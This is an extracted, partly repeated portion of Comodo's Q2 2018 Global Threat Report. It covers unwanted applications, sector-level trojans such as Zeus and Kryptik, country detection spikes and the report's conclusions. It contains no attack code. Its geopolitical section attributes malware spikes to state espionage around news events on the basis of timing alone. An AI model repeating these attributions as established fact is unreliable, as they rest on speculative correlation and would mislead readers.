- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
